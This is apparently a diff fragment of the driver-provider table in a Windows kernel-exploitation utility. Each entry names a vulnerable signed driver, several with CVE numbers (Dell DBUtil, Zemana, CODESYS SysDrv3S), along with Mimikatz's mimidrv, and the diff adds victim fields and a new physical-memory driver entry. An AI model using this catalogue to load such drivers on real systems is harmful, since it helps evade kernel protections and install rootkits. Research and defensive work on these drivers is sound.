(LPWSTR)L"Gmer 'Antirootkit'",
(LPWSTR)L"gmerdrv",
(LPWSTR)L"gmerdrv",
- (LPWSTR)L"GMEREK Systemy Komputerowe Przemyslaw Gmerek",
+ (LPWSTR)L"GMEREK Systemy Komputerowe Przemyslaw Gmerek"
},
{
@@ -254,13 +270,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_DBUTIL23,
KDU_PROVIDER_DBUTIL23,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_NO_UNLOAD_SUP,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"CVE-2021-21551",
(LPWSTR)L"DBUtil23",
(LPWSTR)L"DBUtil_2_3",
- (LPWSTR)L"Dell Inc.",
+ (LPWSTR)L"Dell Inc."
},
{
@@ -268,13 +285,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_MIMIDRV,
KDU_PROVIDER_MIMIDRV,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_NONE,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"Mimikatz mimidrv",
(LPWSTR)L"mimidrv",
(LPWSTR)L"mimidrv",
- (LPWSTR)L"Benjamin Delpy",
+ (LPWSTR)L"Benjamin Delpy"
},
{
@@ -282,27 +300,29 @@ KDU_DB_ENTRY gProvEntry[] = {
NT_WIN10_21H2,
IDR_KPH,
KDU_PROVIDER_KPH,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"KProcessHacker",
(LPWSTR)L"KProcessHacker",
(LPWSTR)L"KProcessHacker2",
- (LPWSTR)L"Wen Jia Liu",
+ (LPWSTR)L"Wen Jia Liu"
},
{
KDU_MIN_NTBUILDNUMBER,
NT_WIN10_21H2,
- IDR_PROCEXP,
+ IDR_PROCEXP1627,
KDU_PROVIDER_PROCEXP,
+ KDU_VICTIM_PE1627,
SourceBaseNone,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PML4_FROM_LOWSTUB | KDUPROV_FLAGS_NO_VICTIM,
KDUPROV_SC_ALL_DEFAULT,
- (LPWSTR)PROCEXP_DESC,
+ (LPWSTR)PROCEXP1627_DESC,
(LPWSTR)PROCEXP152,
(LPWSTR)PROCEXP152,
- (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher",
+ (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher"
},
{
@@ -310,13 +330,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_DBUTILDRV2,
KDU_PROVIDER_DBUTILDRV2,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_NO_FORCED_SD,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"CVE-2021-36276",
(LPWSTR)L"DBUtilDrv2",
(LPWSTR)L"DBUtil_2_5",
- (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher",
+ (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher"
},
{
@@ -324,13 +345,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_DBK64,
KDU_PROVIDER_DBK64,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_NO_VICTIM,
KDUPROV_SC_V4,
(LPWSTR)L"Cheat Engine Dbk64",
(LPWSTR)L"CEDRIVER73",
(LPWSTR)L"CEDRIVER73",
- (LPWSTR)L"Cheat Engine",
+ (LPWSTR)L"Cheat Engine"
},
{
@@ -338,13 +360,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ASUSIO3,
KDU_PROVIDER_ASUSIO3,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"ASUS GPU Tweak II",
(LPWSTR)L"AsIO3",
(LPWSTR)L"Asusgio3",
- (LPWSTR)L"ASUSTeK Computer Inc.",
+ (LPWSTR)L"ASUSTeK Computer Inc."
},
{
@@ -352,13 +375,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_HW64,
KDU_PROVIDER_HW64,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"Marvin Hardware Access Driver for Windows",
(LPWSTR)L"hw64",
(LPWSTR)L"hw",
- (LPWSTR)L"Marvin Test Solutions, Inc.",
+ (LPWSTR)L"Marvin Test Solutions, Inc."
},
{
@@ -366,13 +390,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_SYSDRV3S,
KDU_PROVIDER_SYSDRV3S,
+ KDU_VICTIM_DEFAULT,
SourceBaseMapMem,
KDUPROV_FLAGS_PML4_FROM_LOWSTUB | KDUPROV_FLAGS_NO_UNLOAD_SUP,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"CODESYS SysDrv3S (CVE-2022-22516)",
(LPWSTR)L"SysDrv3S",
(LPWSTR)L"SysDrv3S",
- (LPWSTR)L"3S-Smart Software Solutions GmbH.",
+ (LPWSTR)L"3S-Smart Software Solutions GmbH."
},
{
@@ -380,13 +405,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ZEMANA,
KDU_PROVIDER_ZEMANA,
+ KDU_VICTIM_PE1702,
SourceBaseNone,
KDUPROV_FLAGS_SIGNATURE_WHQL,
KDUPROV_SC_V4,
(LPWSTR)L"Zemana (CVE-2021-31728, CVE-2022-42045)",
(LPWSTR)L"ZemanaAntimalware",
(LPWSTR)L"amsdk",
- (LPWSTR)L"WATCHDOGDEVELOPMENT.COM, LLC",
+ (LPWSTR)L"WATCHDOGDEVELOPMENT.COM, LLC"
},
{
@@ -394,13 +420,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_INPOUTX64,
KDU_PROVIDER_INPOUTX64,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"inpoutx64 Driver Version 1.2",
(LPWSTR)L"inpoutx64",
(LPWSTR)L"inpoutx64",
- (LPWSTR)L"Red Fox UK Limited",
+ (LPWSTR)L"Red Fox UK Limited"
},
{
@@ -408,13 +435,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_PASSMARK_OSF,
KDU_PROVIDER_PASSMARK_OSF,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"PassMark OSForensics DirectIO",
(LPWSTR)L"DirectIo64",
(LPWSTR)L"DIRECTIO64",
- (LPWSTR)L"PassMark Software Pty Ltd",
+ (LPWSTR)L"PassMark Software Pty Ltd"
},
{
@@ -422,13 +450,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ASROCKDRV,
KDU_PROVIDER_ASROCK,
+ KDU_VICTIM_DEFAULT,
SourceBaseRWEverything,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PHYSICAL_BRUTE_FORCE,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"ASRock IO Driver",
(LPWSTR)L"AsrDrv106",
(LPWSTR)L"AsrDrv106",
- (LPWSTR)L"ASROCK Incorporation",
+ (LPWSTR)L"ASROCK Incorporation"
},
{
@@ -436,13 +465,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ALSYSIO64,
KDU_PROVIDER_ALCPU,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PHYSICAL_BRUTE_FORCE,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"Core Temp",
(LPWSTR)L"ALSysIO64",
(LPWSTR)L"ALSysIO",
- (LPWSTR)L"ALCPU (Arthur Liberman)",
+ (LPWSTR)L"ALCPU (Arthur Liberman)"
},
{
@@ -450,13 +480,29 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_AMD_RYZENMASTER,
KDU_PROVIDER_AMD_RYZENMASTER,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PHYSICAL_BRUTE_FORCE,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"AMD Ryzen Master Service Driver",
(LPWSTR)L"AMDRyzenMasterDriver",
(LPWSTR)L"AMDRyzenMasterDriverV20",
- (LPWSTR)L"Advanced Micro Devices Inc.",
+ (LPWSTR)L"Advanced Micro Devices Inc."
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ KDU_MAX_NTBUILDNUMBER,
+ IDR_PHYSMEM,
+ KDU_PROVIDER_HR_PHYSMEM,
+ KDU_VICTIM_DEFAULT,
+ SourceBaseNone,
+ KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PHYSICAL_BRUTE_FORCE,
+ KDUPROV_SC_ALL_DEFAULT,
+ (LPWSTR)L"Physical Memory Access Driver",
+ (LPWSTR)L"physmem",
+ (LPWSTR)L"PHYSMEMVIEWER",
+ (LPWSTR)L"Hilscher Gesellschaft fuer Systemautomation mbH"
}
};